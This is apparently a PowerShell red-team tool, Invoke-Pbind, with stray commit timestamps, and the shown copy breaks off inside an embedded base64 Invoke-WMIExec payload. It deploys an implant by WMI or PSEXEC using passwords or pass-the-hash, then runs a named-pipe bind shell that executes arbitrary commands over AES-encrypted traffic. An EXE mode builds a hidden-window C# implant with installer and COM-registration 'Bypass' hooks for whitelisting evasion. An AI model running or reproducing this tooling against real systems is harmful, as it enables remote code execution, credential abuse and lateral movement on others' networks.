2018-07-23 08:55:15 +00:00
<#
2018-08-15 08:18:05 +00:00
2018-07-23 08:55:15 +00:00
Required Dependencies : None
Optional Dependencies : None
#>
Function Invoke-Pbind {
<#
. SYNOPSIS
The Invoke-Pbind is an SMB bind shell that overlays SMB by communicating over a named pipe .
Incorperating input from @bturner Invoke-Pipekat tool and Invoke-WMIExec from @kevin_robertson
. DESCRIPTION
When in a locked down environment and needing to deploy a bind shell , Invoke-Pbind , will execute an implant on the target
endpoint ( using WMI as default or PSEXEC ) and then connect to the host over the created named pipe . This comms method does
not beacon and instead creates one connection to stream data . The client executes in a runspace with function s ( pbind-command
and pbind-module ) to interacte with the implant on the target workstation . If it is not possible to deploy over wmi or psexec ,
then use the exe option to create a bind shell executable and deploy manually , before connecting with the client .
Interacting with the Implant
###################################################################################
# #
# 1. Load Modules: PS C:\> Pbind-module "c:\modules folder\powerview.ps1" #
# #
# 2. Send Commands to Implant: PS C:\> Pbind-Command "net user administrator" #
# #
# 3. Kill Implant: PS C:\> PBind-Kill #
# #
###################################################################################
. PARAMETER target
Specifies the computer name or ip address of the target system the implant should be deployed or the client should connect to .
. PARAMETER domain
Specifies the domain name used as part of the authentication against the target machine .
. PARAMETER user
Specifies the username used as part of the authentication against the target machine .
. PARAMETER password
Specifies the password used as part of the authentication against the target machine .
. PARAMETER key
Specifies the key used by AES to encrypt and decrypt traffic . Must be the correct size . Should only be manually configured when used in client mode .
. PARAMETER secret
Specifies a value that is exchanged between the client and the implant at first connection . If the wrong secret is exchanged the pipe is closed
. PARAMETER pname
Specifies a hard coded pipe name to be used . Most commonly used in client mode to define the pipe on the target .
. PARAMETER timeout
Allows a user configurable option to specify the timeout used by the client to connect to the implant before giving up . Default 60 seconds .
. PARAMETER dir
Specifies the output directory used when in EXE mode .
. PARAMETER automation
Specifies the directory used to store the 'System.Management.Automation.dll' for use in compiling the implant .
. PARAMETER psexec
Specifies the use of PSEXEC instead of WMI as a deployment mechanism .
. PARAMETER client
Switches mode to client only mode , disabling the deployment feature .
. PARAMETER exe
Switches to executable mode , used to create a stand alone implant to be manually deployed .
. EXAMPLE
Invoke-Pbind -Target 10.0 . 0 . 100 -Domain LAB -User Admin -Password Password1
. EXAMPLE
Invoke-Pbind -Target 10.0 . 0 . 100 -Domain LAB -User Admin -Password Password1 -PSexec
. EXAMPLE
2018-08-15 08:18:05 +00:00
Invoke-Pbind -Target 10.0 . 0 . 100 -Domain . -User Admin -Hash AAAAAAAAAAAAAAAAAAAAAAAAA -PSexec
. EXAMPLE
Invoke-Pbind -Target 10.0 . 0 . 100 -Domain . -User Admin -Hash AAAAAAAAAAAAAAAAAAAAAAAAA -user2 john -domain2 LAB - password2 Password1 -PSexec
2018-07-23 08:55:15 +00:00
. EXAMPLE
Invoke-Pbind -Target 10.0 . 0 . 100 -Domain . -User Admin -Password Password1 -timeout 10000
. EXAMPLE
Invoke-pbind -target 10.0 . 0 . 100 -dir " c:\pbind-out " -automation " C:\pbind-in " -exe
. EXAMPLE
Invoke-pbind -target 10.0 . 0 . 100 -secret do1gu -key jhPtfSwdNCWkks3qcDcj8OYtT / a3QY9VS / 3HMX + 54RQ = -pname ndv4ut7fyg -client
#>
Param (
[ Parameter ( Mandatory = $false ) ]
[ string ] $target ,
[ Parameter ( Mandatory = $false ) ]
[ string ] $domain ,
[ Parameter ( Mandatory = $false ) ]
[ string ] $user ,
[ Parameter ( Mandatory = $false ) ]
[ string ] $password ,
[ Parameter ( Mandatory = $false ) ]
2018-08-15 08:18:05 +00:00
[ string ] $domain2 ,
[ Parameter ( Mandatory = $false ) ]
[ string ] $user2 ,
[ Parameter ( Mandatory = $false ) ]
[ string ] $password2 ,
[ Parameter ( Mandatory = $false ) ]
[ string ] $hash ,
[ Parameter ( Mandatory = $false ) ]
2018-07-23 08:55:15 +00:00
[ string ] $key ,
[ Parameter ( Mandatory = $False ) ]
[ string ] $secret ,
[ Parameter ( Mandatory = $False ) ]
[ string ] $pname ,
[ Parameter ( Mandatory = $false ) ]
[ int ] $timeout = 60000 ,
[ Parameter ( Mandatory = $False ) ]
[ string ] $dir ,
[ Parameter ( Mandatory = $False ) ]
[ string ] $automation ,
[ Parameter ( Mandatory = $false ) ]
[ switch ] $psexec ,
[ Parameter ( Mandatory = $false ) ]
[ switch ] $client ,
[ Parameter ( Mandatory = $false ) ]
[ switch ] $exe
)
$global:pipestate = [ HashTable ] :: Synchronized ( @ { } )
$pipestate . log = New-Object System . Collections . ArrayList
$pipestate . command = $null
$pipestate . state = $false
2018-08-15 08:18:05 +00:00
2018-07-23 08:55:15 +00:00
function Random-Pipe
{
param (
[ int ] $Length
)
$set = 'abcdefghijklmnopqrstuvwxyz0123456789' . ToCharArray ( )
$result = ''
for ( $x = 0 ; $x -lt $Length ; $x + + )
{ $result + = $set | Get-Random }
return $result
}
# creates a randon AES managed object
function Create-AesManagedObject
{
param
( [ Object ]
$key ,
[ Object ]
$IV )
$aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
$aesManaged . Mode = [ System.Security.Cryptography.CipherMode ] :: CBC
$aesManaged . Padding = [ System.Security.Cryptography.PaddingMode ] :: Zeros
$aesManaged . BlockSize = 128
$aesManaged . KeySize = 256
if ( $IV )
{
if ( $IV . getType ( ) . Name -eq 'String' )
{ $aesManaged . IV = [ System.Convert ] :: FromBase64String ( $IV ) }
else
{ $aesManaged . IV = $IV }
}
if ( $key )
{
if ( $key . getType ( ) . Name -eq 'String' )
{ $aesManaged . Key = [ System.Convert ] :: FromBase64String ( $key ) }
else
{ $aesManaged . Key = $key }
}
$aesManaged
}
# creates a randon AES symetric encryption key
function Create-AesKey ( )
{
$aesManaged = Create-AesManagedObject
$aesManaged . GenerateKey ( )
[ System.Convert ] :: ToBase64String ( $aesManaged . Key )
}
# encryption utility using Rijndael encryption, an AES equivelant, returns encrypted base64 block
function Encrypt-String
{
param
(
[ Object ]
$key ,
[ Object ]
$unencryptedString
)
$bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( $unencryptedString )
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged . CreateEncryptor ( )
$encryptedData = $encryptor . TransformFinalBlock ( $bytes , 0 , $bytes . Length )
[ byte[] ] $fullData = $aesManaged . IV + $encryptedData
[ System.Convert ] :: ToBase64String ( $fullData )
}
# decryption utility using Rijndael encryption, an AES equivelant, returns unencrypted UTF8 data
function Decrypt-String
{
param
(
[ Object ]
$key ,
[ Object ]
$encryptedStringWithIV
)
$bytes = [ System.Convert ] :: FromBase64String ( $encryptedStringWithIV )
$IV = $bytes [ 0 . .15 ]
$aesManaged = Create-AesManagedObject $key $IV
$decryptor = $aesManaged . CreateDecryptor ( )
$unencryptedData = $decryptor . TransformFinalBlock ( $bytes , 16 , $bytes . Length - 16 )
[ System.Text.Encoding ] :: UTF8 . GetString ( $unencryptedData ) . Trim ( [ char ] 0 )
}
if ( ! $key ) {
$key = Create-AesKey
}
if ( ! $pname ) {
$pname = Random-Pipe 10
}
if ( ! $secret ) {
$secret = Random-Pipe 5
}
# creates a randon AES managed object
$s_scriptblock = @"
function Create-AesManagedObject
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ IV
)
`$ aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
`$ aesManaged . Mode = [ System.Security.Cryptography.CipherMode ] :: CBC
`$ aesManaged . Padding = [ System.Security.Cryptography.PaddingMode ] :: Zeros
`$ aesManaged . BlockSize = 128
`$ aesManaged . KeySize = 256
if ( `$ IV )
{
if ( `$ IV . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . IV = [ System.Convert ] :: FromBase64String ( `$ IV ) }
else
{ `$ aesManaged . IV = `$ IV }
}
if ( `$ key )
{
if ( `$ key . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . Key = [ System.Convert ] :: FromBase64String ( `$ key ) }
else
{ `$ aesManaged . Key = `$ key }
}
`$ aesManaged
}
function Encrypt-String
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ unencryptedString
)
`$ bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( `$ unencryptedString )
`$ aesManaged = Create-AesManagedObject `$ key
`$ encryptor = `$ aesManaged . CreateEncryptor ( )
`$ encryptedData = `$ encryptor . TransformFinalBlock ( `$ bytes , 0 , `$ bytes . Length )
[ byte[] ] `$ fullData = `$ aesManaged . IV + `$ encryptedData
[ System.Convert ] :: ToBase64String ( `$ fullData )
}
function Decrypt-String
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ encryptedStringWithIV
)
`$ bytes = [ System.Convert ] :: FromBase64String ( `$ encryptedStringWithIV )
`$ IV = `$ bytes [ 0 . .15 ]
`$ aesManaged = Create-AesManagedObject `$ key `$ IV
`$ decryptor = `$ aesManaged . CreateDecryptor ( )
`$ unencryptedData = `$ decryptor . TransformFinalBlock ( `$ bytes , 16 , `$ bytes . Length - 16 )
[ System.Text.Encoding ] :: UTF8 . GetString ( `$ unencryptedData ) . Trim ( [ char ] 0 )
}
function invoke-pserv {
param ( `$ secret , `$ key , `$ pname )
add-Type -assembly 'System.Core'
`$ PipeSecurity = New-Object System . IO . Pipes . PipeSecurity
`$ AccessRule = New-Object System . IO . Pipes . PipeAccessRule ( 'Everyone' , 'ReadWrite' , 'Allow' )
`$ PipeSecurity . AddAccessRule ( `$ AccessRule )
`$ Pipe = New-Object System . IO . Pipes . NamedPipeServerStream ( `$ pname , 'InOut' , 100 , 'Byte' , 'None' , 4096 , 4096 , `$ PipeSecurity )
try {
'Waiting for client connection'
`$ pipe . WaitForConnection ( )
'Connection established'
`$ pipeReader = new-object System . IO . StreamReader ( `$ pipe )
`$ pipeWriter = new-object System . IO . StreamWriter ( `$ pipe )
`$ pipeWriter . AutoFlush = `$ true
`$ PPass = `$ pipeReader . ReadLine ( )
while ( 1 )
{
if ( `$ PPass -ne `$ secret ) {
`$ pipeWriter . WriteLine ( 'Microsoft Error: 151337' )
}
else {
while ( 1 ) {
`$ encCommand = Encrypt-String -unencryptedString 'COMMAND' -Key `$ key
`$ pipeWriter . WriteLine ( `$ encCommand )
`$ command = `$ pipeReader . ReadLine ( )
`$ decCommand = Decrypt-String -key `$ key -encryptedStringWithIV `$ command
if ( `$ deccommand ) {
try {
if ( `$ decCommand -eq 'KILLPIPE' ) { exit }
`$ res = Invoke-Expression `$ decCommand | out-string
2018-08-15 08:18:05 +00:00
if ( `$ res -eq " " ) { `$ res = " No output from command " }
2018-07-23 08:55:15 +00:00
`$ res = `$ res + '123456PS ' + ( Get-Location ) . Path + '>654321'
} catch {
`$ res = 'ErrorUpload: ' + `$ error [ 0 ]
}
`$ fileContentBytes = [ System.Text.Encoding ] :: Unicode . GetBytes ( `$ res )
`$ res = [ System.Convert ] :: ToBase64String ( `$ fileContentBytes )
`$ encCommand2 = Encrypt-String -unencryptedString `$ res -Key `$ key
`$ pipeWriter . WriteLine ( `$ encCommand2 )
`$ pipeWriter . Flush ( )
}
elseif ( ! `$ decCommand ) {
2018-08-15 08:18:05 +00:00
`$ encbad = Encrypt-String -unencryptedString 'This should never fire! - crypto failure' -Key `$ key
`$ pipeWriter . WriteLine ( `$ encbad )
2018-07-23 08:55:15 +00:00
break
}
}
}
`$ encGo = Encrypt-String -unencryptedString 'GOAGAIN' -Key `$ key
`$ pipeWriter . WriteLine ( `$ encGo )
`$ encSure = Encrypt-String -unencryptedString 'SURE' -Key `$ key
`$ pipeWriter . WriteLine ( `$ encSure )
`$ command = `$ pipeReader . ReadLine ( )
`$ decCommand = Decrypt-String -key `$ key -encryptedStringWithIV `$ command
if ( `$ decCommand -eq 'EXIT' ) { break }
}
Start-Sleep -Seconds 2
}
finally {
`$ pipe . Dispose ( )
}
}
invoke-pserv -secret $secret -key $key -pname $pname
" @
$c_scriptblock = @"
function Create-AesManagedObject
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ IV
)
`$ aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
`$ aesManaged . Mode = [ System.Security.Cryptography.CipherMode ] :: CBC
`$ aesManaged . Padding = [ System.Security.Cryptography.PaddingMode ] :: Zeros
`$ aesManaged . BlockSize = 128
`$ aesManaged . KeySize = 256
if ( `$ IV )
{
if ( `$ IV . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . IV = [ System.Convert ] :: FromBase64String ( `$ IV ) }
else
{ `$ aesManaged . IV = `$ IV }
}
if ( `$ key )
{
if ( `$ key . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . Key = [ System.Convert ] :: FromBase64String ( `$ key ) }
else
{ `$ aesManaged . Key = `$ key }
}
`$ aesManaged
}
function Encrypt-String
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ unencryptedString
)
`$ bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( `$ unencryptedString )
`$ aesManaged = Create-AesManagedObject `$ key
`$ encryptor = `$ aesManaged . CreateEncryptor ( )
`$ encryptedData = `$ encryptor . TransformFinalBlock ( `$ bytes , 0 , `$ bytes . Length )
[ byte[] ] `$ fullData = `$ aesManaged . IV + `$ encryptedData
[ System.Convert ] :: ToBase64String ( `$ fullData )
}
function Decrypt-String
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ encryptedStringWithIV
)
`$ bytes = [ System.Convert ] :: FromBase64String ( `$ encryptedStringWithIV )
`$ IV = `$ bytes [ 0 . .15 ]
`$ aesManaged = Create-AesManagedObject `$ key `$ IV
`$ decryptor = `$ aesManaged . CreateDecryptor ( )
`$ unencryptedData = `$ decryptor . TransformFinalBlock ( `$ bytes , 16 , `$ bytes . Length - 16 )
[ System.Text.Encoding ] :: UTF8 . GetString ( `$ unencryptedData ) . Trim ( [ char ] 0 )
}
function invoke-pclient {
param ( `$ Target , `$ secret , `$ key , `$ pname , `$ timeout )
Add-Type -assembly 'System.Core'
`$ pipec = new-object System . IO . Pipes . NamedPipeClientStream ( `$ Target , `$ pname , [ System.IO.Pipes.PipeDirection ] :: InOut ,
[ System.IO.Pipes.PipeOptions ] :: None ,
[ System.Security.Principal.TokenImpersonationLevel ] :: Impersonation )
`$ pipeReader = `$ pipeWriter = `$ null
try {
`$ pipec . Connect ( `$ timeout )
'Connected to Pipe'
`$ pipestate . state = `$ true
`$ pipeReader = new-object System . IO . StreamReader ( `$ pipec )
`$ pipeWriter = new-object System . IO . StreamWriter ( `$ pipec )
`$ pipeWriter . AutoFlush = `$ true
`$ pipeWriter . WriteLine ( `$ secret )
while ( 1 ) {
while ( ( `$ msg = Decrypt-String -key `$ key -encryptedStringWithIV `$ pipeReader . ReadLine ( ) ) -notmatch 'COMMAND|GOAGAIN' ) {
`$ pipestate . log + = [ System.Text.Encoding ] :: Unicode . GetString ( [ System.Convert ] :: FromBase64String ( `$ msg ) )
}
if ( `$ msg -match 'GOAGAIN' ) { break }
while ( `$ pipestate . command -eq `$ null ) { }
if ( `$ pipestate . kill -eq 'KILLPIPE' ) {
`$ encSure = Encrypt-String -unencryptedString 'SURE' -Key `$ key
`$ pipeWriter . WriteLine ( `$ encSure )
}
2018-08-15 08:18:05 +00:00
#`$blah = `$pipestate.mod | out-string
#if (((`$blah).ToLower()).StartsWith("loadmodule")) {
#if (`$blah -eq `$encSure) {
# `$module = `$blah -replace 'loadmodule ', ''
# `$pipestate.command = gc `$module | out-string
#}
if ( ( `$ pipestate . command ) . ToLower ( ) . StartsWith ( 'squirtmodule' ) ) {
`$ squirt = `$ pipestate . command -replace 'squirtmodule ' , ''
`$ pipestate . command = `$ squirt | Out-String
}
#`$pipestate.history = `$pipestate.command
2018-07-23 08:55:15 +00:00
`$ baseCommand = `$ pipestate . command
2018-08-15 08:18:05 +00:00
`$ encCommand = Encrypt-String -unencryptedString `$ baseCommand -Key `$ key
2018-07-23 08:55:15 +00:00
`$ pipeWriter . WriteLine ( `$ encCommand )
2018-08-15 08:18:05 +00:00
`$ script : pipestate . command = `$ null
2018-07-23 08:55:15 +00:00
}
}
finally {
`$ pipec . Dispose ( )
}
}
invoke-pclient -Target $target -secret $secret -key $key -pname $pname -timeout $timeout
" @
if ( $client . IsPresent ) {
$PIPE_runspace = [ RunspaceFactory ] :: CreateRunspace ( )
$PIPE_runspace . Open ( )
$PIPE_runspace . SessionStateProxy . SetVariable ( 'pipestate' , $pipestate )
$PIPE_powershell = [ PowerShell ] :: Create ( )
$PIPE_powershell . Runspace = $PIPE_runspace
$PIPE_powershell . AddScript ( $c_scriptblock ) > $null
$PIPE_powershell . BeginInvoke ( ) > $null
echo " "
$endtime = ( Get-Date ) . AddMilliseconds ( $timeout )
while ( ( Get-Date ) -lt $endtime ) {
if ( $pipestate . state -eq $true )
{ break }
}
if ( $pipestate . state -eq $True ) {
echo " Connected: $target - $pname "
echo " "
}
elseif ( ( get-date ) -lt $endtime ) {
echo " Not Connected: Timeout occured "
}
else {
echo " Not Connected: :-( "
}
}
elseif ( $exe . isPresent ) {
if ( ! $dir ) {
$dir = " C:\temp "
}
if ( ! $automation ) {
Write-host " You need to tell me where to get the automation dll to continue "
break
}
# create exe
$bytescom = [ System.Text.Encoding ] :: Unicode . GetBytes ( $s_scriptblock )
$praw = [ Convert ] :: ToBase64String ( $bytescom )
$csccode = ' using System ;
using System . Text ;
using System . Diagnostics ;
using System . Reflection ;
using System . Configuration . Install ;
using System . Runtime . InteropServices ;
using System . Collections . ObjectModel ;
using System . Management . Automation ;
using System . Management . Automation . Runspaces ;
using System . EnterpriseServices ;
public class Program
{
[ DllImport ( " kernel32.dll " ) ]
static extern IntPtr GetConsoleWindow ( ) ;
[ DllImport ( " user32.dll " ) ]
static extern bool ShowWindow ( IntPtr hWnd , int nCmdShow ) ;
public const int SW_HIDE = 0 ;
public const int SW_SHOW = 5 ;
public Program ( ) {
try
{
string pb = System . Text . Encoding . Unicode . GetString ( System . Convert . FromBase64String ( " '+ $praw +' " ) ) ;
InvokeAutomation ( pb ) ;
}
catch
{
Main ( ) ;
}
}
public static string InvokeAutomation ( string cmd )
{
Runspace newrunspace = RunspaceFactory . CreateRunspace ( ) ;
newrunspace . Open ( ) ;
RunspaceInvoke scriptInvoker = new RunspaceInvoke ( newrunspace ) ;
Pipeline pipeline = newrunspace . CreatePipeline ( ) ;
pipeline . Commands . AddScript ( cmd ) ;
Collection < PSObject > results = pipeline . Invoke ( ) ;
newrunspace . Close ( ) ;
StringBuilder stringBuilder = new StringBuilder ( ) ;
foreach ( PSObject obj in results )
{
stringBuilder . Append ( obj ) ;
}
return stringBuilder . ToString ( ) . Trim ( ) ;
}
public static void Main ( )
{
var handle = GetConsoleWindow ( ) ;
ShowWindow ( handle , SW_HIDE ) ;
try
{
string pb = System . Text . Encoding . Unicode . GetString ( System . Convert . FromBase64String ( " '+ $praw +' " ) ) ;
InvokeAutomation ( pb ) ;
}
catch
{
Main ( ) ;
}
}
}
public class Bypass : ServicedComponent
{
[ ComRegisterFunction ]
public static void RegisterClass ( string key )
{
Program . Main ( ) ;
}
[ ComUnregisterFunction ]
public static void UnRegisterClass ( string key )
{
Program . Main ( ) ;
}
}
[ System . ComponentModel . RunInstaller ( true ) ]
public class Sample : System . Configuration . Install . Installer
{
public override void Uninstall ( System . Collections . IDictionary savedState )
{
Program . Main ( ) ;
}
public static string InvokeAutomation ( string cmd )
{
Runspace newrunspace = RunspaceFactory . CreateRunspace ( ) ;
newrunspace . Open ( ) ;
RunspaceInvoke scriptInvoker = new RunspaceInvoke ( newrunspace ) ;
Pipeline pipeline = newrunspace . CreatePipeline ( ) ;
pipeline . Commands . AddScript ( cmd ) ;
Collection < PSObject > results = pipeline . Invoke ( ) ;
newrunspace . Close ( ) ;
StringBuilder stringBuilder = new StringBuilder ( ) ;
foreach ( PSObject obj in results )
{
stringBuilder . Append ( obj ) ;
}
return stringBuilder . ToString ( ) . Trim ( ) ;
}
} '
[ IO.File ] :: WriteAllLines ( " $dir \pbind.cs " , $csccode )
if ( Test-Path " C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe " ) {
2018-08-15 08:18:05 +00:00
Start-Process -WindowStyle hidden -FilePath " C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe " -ArgumentList " /out: $dir \notes.exe $dir \pbind.cs /reference: $automation \System.Management.Automation.dll "
2018-07-23 08:55:15 +00:00
} else {
if ( Test-Path " C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe " ) {
2018-08-15 08:18:05 +00:00
Start-Process -WindowStyle hidden -FilePath " C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe " -ArgumentList " /out: $dir \notes.exe $dir \pbind.cs /reference: $automation \System.Management.Automation.dll "
2018-07-23 08:55:15 +00:00
}
}
echo " "
Write-Host -Object " StandAlone Exe written to: $dir \pbind.exe " -ForegroundColor Green
echo " "
if ( ! $target ) {
write-Host -Object " Connection String: invoke-pbind -target <IP Address> -secret $secret -key $key -pname $pname -client " -ForegroundColor Green
} else {
write-Host -Object " Connection String: invoke-pbind -target $target -secret $secret -key $key -pname $pname -client " -ForegroundColor Green
}
}
Else {
# Author: @kevin_robertson
$wmiexec = " ZnVuY3Rpb24gSW52b2tlLVdNSUV4ZWMNCnsNCjwjDQouU1lOT1BTSVMNCkludm9rZS1XTUlFeGVjIHBlcmZvcm1zIFdNSSBjb21tYW5kIGV4ZWN1dGlvbiBvbiB0YXJnZXRzIHVzaW5nIE5UTE12MiBwYXNzIHRoZSBoYXNoIGF1dGhlbnRpY2F0aW9uLg0KDQouUEFSQU1FVEVSIFRhcmdldA0KSG9zdG5hbWUgb3IgSVAgYWRkcmVzcyBvZiB0YXJnZXQuDQoNCi5QQVJBTUVURVIgVXNlcm5hbWUNClVzZXJuYW1lIHRvIHVzZSBmb3IgYXV0aGVudGljYXRpb24uDQoNCi5QQVJBTUVURVIgRG9tYWluDQpEb21haW4gdG8gdXNlIGZvciBhdXRoZW50aWNhdGlvbi4gVGhpcyBwYXJhbWV0ZXIgaXMgbm90IG5lZWRlZCB3aXRoIGxvY2FsIGFjY291bnRzIG9yIHdoZW4gdXNpbmcgQGRvbWFpbiBhZnRlcg0KdGhlIHVzZXJuYW1lLiANCg0KLlBBUkFNRVRFUiBIYXNoDQpOVExNIHBhc3N3b3JkIGhhc2ggZm9yIGF1dGhlbnRpY2F0aW9uLiBUaGlzIG1vZHVsZSB3aWxsIGFjY2VwdCBlaXRoZXIgTE06TlRMTSBvciBOVExNIGZvcm1hdC4NCg0KLlBBUkFNRVRFUiBDb21tYW5kDQpDb21tYW5kIHRvIGV4ZWN1dGUgb24gdGhlIHRhcmdldC4gSWYgYSBjb21tYW5kIGlzIG5vdCBzcGVjaWZpZWQsIHRoZSBmdW5jdGlvbiB3aWxsIGp1c3QgY2hlY2sgdG8gc2VlIGlmIHRoZQ0KdXNlcm5hbWUgYW5kIGhhc2ggaGFzIGFjY2VzcyB0byBXTUkgb24gdGhlIHRhcmdldC4NCg0KLlBBUkFNRVRFUiBTbGVlcA0KRGVmYXVsdCA9IDEwIE1pbGxpc2Vjb25kczogU2V0cyB0aGUgZnVuY3Rpb24ncyBTdGFydC1TbGVlcCB2YWx1ZXMgaW4gbWlsbGlzZWNvbmRzLiBZb3UgY2FuIHRyeSB0d2Vha2luZyB0aGlzDQpzZXR0aW5nIGlmIHlvdSBhcmUgZXhwZXJpZW5jaW5nIHN0cmFuZ2UgcmVzdWx0cy4NCg0KLkVYQU1QTEUNCkludm9rZS1XTUlFeGVjIC1UYXJnZXQgMTkyLjE2OC4xMDAuMjAgLURvbWFpbiBURVNURE9NQUlOIC1Vc2VybmFtZSBURVNUIC1IYXNoIEY2RjM4Qjc5M0RCNkE5NEJBMDRBNTJGMUQzRUU5MkYwIC1Db21tYW5kICJjb21tYW5kIG9yIGxhdW5jaGVyIHRvIGV4ZWN1dGUiIC12ZXJib3NlDQoNCi5FWEFNUExFDQpJbnZva2UtV01JRXhlYyAtVGFyZ2V0IDE5Mi4xNjguMTAwLjIwIC1Vc2VybmFtZSBhZG1pbmlzdHJhdG9yIC1IYXNoIEY2RjM4Qjc5M0RCNkE5NEJBMDRBNTJGMUQzRUU5MkYwIC1Db21tYW5kICJjbWQuZXhlIC9jIG5ldCB1c2VyIFdNSUV4ZWMgV2ludGVyMjAxNyAvYWRkIg0KDQouRVhBTVBMRQ0KSW52b2tlLVdNSUV4ZWMgLVRhcmdldCAxOTIuMTY4LjEwMC4yMCAtVXNlcm5hbWUgYWRtaW5pc3RyYXRvciAtUGFzc3dvcmQgVGVzdA0KDQouTElOSw0KaHR0cHM6Ly9naXRodWIuY29tL0tldmluLVJvYmVydHNvbi9JbnZva2UtVGhlSGFzaA0KDQojPg0KW0NtZGxldEJpbmRpbmcoKV0NCnBhcmFtDQooDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JHRydWUpXVtTdHJpbmddJFRhcmdldCwNCiAgICBbcGFyYW1ldGVyKE1hbmRhdG9yeT0kdHJ1ZSldW1N0cmluZ10kVXNlcm5hbWUsDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JGZhbHNlKV1bU3RyaW5nXSREb21haW4sDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JGZhbHNlKV1bU3RyaW5nXSRDb21tYW5kLA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSRmYWxzZSldW1N0cmluZ10kUGFzc3dvcmQsDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JGZhbHNlKV1bVmFsaWRhdGVTY3JpcHQoeyRfLkxlbmd0aCAtZXEgMzIgLW9yICRfLkxlbmd0aCAtZXEgNjV9KV1bU3RyaW5nXSRIYXNoLA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSRmYWxzZSldW0ludF0kU2xlZXA9MTANCikNCg0KaWYoJENvbW1hbmQpDQp7DQogICAgJFdNSV9leGVjdXRlID0gJHRydWUNCn0NCg0KaWYoISRQYXNzd29yZCAtYW5kICEkSGFzaCl7DQogICAgZXhpdA0KfQ0KDQppZigkUGFzc3dvcmQpew0KICAgICRIYXNoID0gR2V0LU1ENEhhc2ggLURhdGFUb0hhc2ggJChbVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0Qnl0ZXMoJFBhc3N3b3JkKSkNCiAgICBXcml0ZS1PdXRwdXQgIkhhc2ggYmVpbmcgdXNlZDogJEhhc2giDQp9DQoNCmZ1bmN0aW9uIENvbnZlcnRGcm9tLVBhY2tldE9yZGVyZWREaWN0aW9uYXJ5DQp7DQogICAgcGFyYW0oJHBhY2tldF9vcmRlcmVkX2RpY3Rpb25hcnkpDQoNCiAgICBGb3JFYWNoKCRmaWVsZCBpbiAkcGFja2V0X29yZGVyZWRfZGljdGlvbmFyeS5WYWx1ZXMpDQogICAgew0KICAgICAgICAkYnl0ZV9hcnJheSArPSAkZmllbGQNCiAgICB9DQoNCiAgICByZXR1cm4gJGJ5dGVfYXJyYXkNCn0NCg0KI1JQQw0KDQpmdW5jdGlvbiBHZXQtUGFja2V0UlBDQmluZCgpDQp7DQogICAgcGFyYW0oW0ludF0kcGFja2V0X2NhbGxfSUQsW0J5dGVbXV0kcGFja2V0X21heF9mcmFnLFtCeXRlW11dJHBhY2tldF9udW1fY3R4X2l0ZW1zLFtCeXRlW11dJHBhY2tldF9jb250ZXh0X0lELFtCeXRlW11dJHBhY2tldF9VVUlELFtCeXRlW11dJHBhY2tldF9VVUlEX3ZlcnNpb24pDQoNCiAgICBbQnl0ZVtdXSRwYWNrZXRfY2FsbF9JRF9ieXRlcyA9IFtTeXN0ZW0uQml0Q29udmVydGVyXTo6R2V0Qnl0ZXMoJHBhY2tldF9jYWxsX0lEKQ0KDQogICAgJHBhY2tldF9SUENCaW5kID0gTmV3LU9iamVjdCBTeXN0ZW0uQ29sbGVjdGlvbnMuU3BlY2lhbGl6ZWQuT3JkZXJlZERpY3Rpb25hcnkNCiAgICAkcGFja2V0X1JQQ0JpbmQuQWRkKCJSUENCaW5kX1ZlcnNpb24iLFtCeXRlW11dKDB4MDUpKQ0KICAgICRwYWNrZXRfUlBDQmluZC5BZGQoIlJQQ0JpbmRfVmVyc2lvbk1pbm9yIixbQnl0ZVtdXSgweDAwKSkNCiAgICAkcGFja2V0X1JQQ0JpbmQuQWRkKCJSUENCaW5kX1BhY2tldFR5cGUiLFtCeXRlW11dKDB4MGIpKQ0KICAgICRwYWNrZXRfUlBDQmluZC5BZGQoIlJQQ0JpbmRfUGFja2V0RmxhZ3MiLFtCeXRlW11dKDB4MDMpKQ0KICAgICRwYWNrZXRfUlBDQmluZC5BZGQoIlJQQ0JpbmRfRGF0YVJlcHJlc2VudGF0aW9uIixbQnl0ZVtdXSgweDEwLDB4MDAsMHgwMCwweDAwKSkNCiAgICAkcGFja2V0X1JQQ0JpbmQuQWRkKCJSUENCaW5kX0ZyYWdMZW5ndGgiLFtCeXR
# Author: @kevin_robertson
